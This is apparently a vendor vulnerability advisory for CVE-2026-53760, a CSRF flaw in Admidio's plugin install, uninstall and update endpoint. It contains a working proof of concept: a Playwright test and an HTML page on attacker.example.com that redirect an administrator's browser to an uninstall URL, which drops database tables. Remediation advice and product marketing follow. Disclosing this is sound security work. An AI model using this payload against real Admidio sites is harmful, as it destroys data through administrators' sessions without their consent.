CVE-2026-53760

CVE-2026-53760 is a medium-severity cross-site request forgery (CSRF) vulnerability in admidio/admidio (composer), affecting versions <= 5.0.11. No fixed version is listed yet.

Check whether CVE-2026-53760 affects your applications

Kodem tells you whether this CVE is present, reachable, and actually executing in your application, so you know if it matters.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence. Only the CVEs that actually run in production.

Summary

Admidio: CSRF on Plugin Install, Uninstall, and Update via Unprotected GET Requests

Full technical description

The modules/plugins.php endpoint handles plugin installation, uninstallation, and update operations via GET requests without CSRF token validation. Because these are top-level navigations, browsers include SameSite=Lax session cookies. An attacker crafts a malicious page that, when an authenticated administrator visits it, triggers arbitrary plugin operations. The uninstall operation executes DROP TABLE SQL scripts and destroys plugin data.

Details

modules/plugins.php reads the mode (install, uninstall, update) and name parameters directly from $_GET:

// modules/plugins.php
$mode = admFuncVariableIsValid($_GET, 'mode', 'string');
$pluginName = admFuncVariableIsValid($_GET, 'name', 'string');

The file contains zero calls to SecurityUtils::validateCsrfToken(). Other administrative operations in the same codebase (such as the save mode in preferences) validate CSRF tokens correctly.

Because the operations use GET requests, modern browsers send SameSite=Lax cookies on top-level GET navigations (link clicks, redirects, window.location assignments). A cross-origin page triggers these operations by navigating the browser to the vulnerable URL.

The doUninstall() function is the most destructive path. It executes SQL scripts from the plugin's db_scripts/ directory, which contain DROP TABLE statements:

// modules/plugins.php - doUninstall()
function doUninstall($pluginFolder) {
    // Reads and executes SQL from $pluginFolder/db_scripts/uninstall.sql
    // Contains DROP TABLE statements
}

Proof of Concept

The following Playwright test demonstrates a cross-origin CSRF attack. An attacker hosts a page on a different origin that redirects an authenticated administrator's browser to the uninstall endpoint:

// playwright-csrf-poc.js
const { test, expect } = require('@playwright/test');

test('CSRF plugin uninstall via cross-origin redirect', async ({ browser }) => {
    const context = await browser.newContext();
    const page = await context.newPage();

    // Step 1: Admin logs in to Admidio
    await page.goto('https://admidio.example.com/adm_program/system/login.php');
    await page.fill('#usr_login_name', 'admin');
    await page.fill('#usr_password', 'password');
    await page.click('#btn_login');
    await page.waitForURL('**/overview.php');

    // Step 2: Admin visits attacker-controlled page on different origin
    // The attacker page contains:
    //   <script>window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday';</script>
    await page.goto('https://attacker.example.com/csrf.html');

    // Step 3: Browser follows redirect with SameSite=Lax cookies
    // The birthday plugin is uninstalled, its database tables dropped
    await page.waitForURL('**/plugins.php*');

    // Verify the plugin was uninstalled
    await page.goto('https://admidio.example.com/adm_program/modules/plugins.php');
    const content = await page.content();
    expect(content).not.toContain('birthday');
});

Simplified attacker page (csrf.html hosted on attacker origin):

<html>
<body>
<script>
  window.location = 'https://admidio.example.com/adm_program/modules/plugins.php?mode=uninstall&name=birthday';
</script>
</body>
</html>

When an administrator visits this page, the browser navigates to the Admidio uninstall URL with full session cookies, and the server uninstalls the birthday plugin.

Impact

An unauthenticated attacker tricks an Admidio administrator into visiting a malicious web page (via phishing, forum post, or embedded content) that performs plugin operations without visible indication. The uninstall operation executes DROP TABLE statements, causing irreversible data loss. The install operation activates plugins with known vulnerabilities. The update operation disrupts plugin functionality. The victim only needs to visit a single page.

A victim's authenticated browser session is used to submit forged requests to an application that cannot distinguish them from legitimate ones. Typical impact: state-changing actions performed as the victim without their consent.

CVE-2026-53760 has a CVSS score of 5.2 (Medium). The vector is network-reachable, high privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

admidio/admidio (<= 5.0.11)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Switch plugin install, uninstall, and update operations from GET to POST requests. Add SecurityUtils::validateCsrfToken() checks to all state-changing operations in modules/plugins.php, consistent with the pattern used elsewhere in the codebase.

Found by aisafe.io

Frequently Asked Questions

  1. What is CVE-2026-53760? CVE-2026-53760 is a medium-severity cross-site request forgery (CSRF) vulnerability in admidio/admidio (composer), affecting versions <= 5.0.11. No fixed version is listed yet. A victim's authenticated browser session is used to submit forged requests to an application that cannot distinguish them from legitimate ones.
  2. How severe is CVE-2026-53760? CVE-2026-53760 has a CVSS score of 5.2 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of admidio/admidio are affected by CVE-2026-53760? admidio/admidio (composer) versions <= 5.0.11 is affected.
  4. Is there a fix for CVE-2026-53760? No fixed version is listed for CVE-2026-53760 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-53760 exploitable, and should I be worried? Whether CVE-2026-53760 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-53760 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-53760? No fixed version is listed yet. In the interim: Use per-session CSRF tokens on all state-changing operations and verify them server-side. SameSite cookie attributes provide additional defense.

Other vulnerabilities in admidio/admidio

Stop the waste.
Protect your environment with Kodem.